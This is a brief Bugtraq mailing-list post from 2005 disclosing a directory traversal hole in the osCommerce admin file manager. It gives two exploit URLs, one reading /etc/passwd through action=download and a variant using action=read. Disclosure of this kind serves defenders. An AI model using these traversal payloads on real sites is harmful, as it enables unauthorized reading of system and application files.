Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

osCommerce File Manager Directory Traversal Vulnerability

From: Megasky <magasky () hotmail com>
Date: 22 Mar 2005 16:32:05 -0000


there is allready a post on this that have 
file_manager.php?action=download&filename=../../../../../../etc/passwd 
 
sometime the action=download doesn't work , so i tried action=read
/admin/file_manager.php?action=read&filename=../../../../
Previous By Date Next
Previous By Thread Next

Current thread: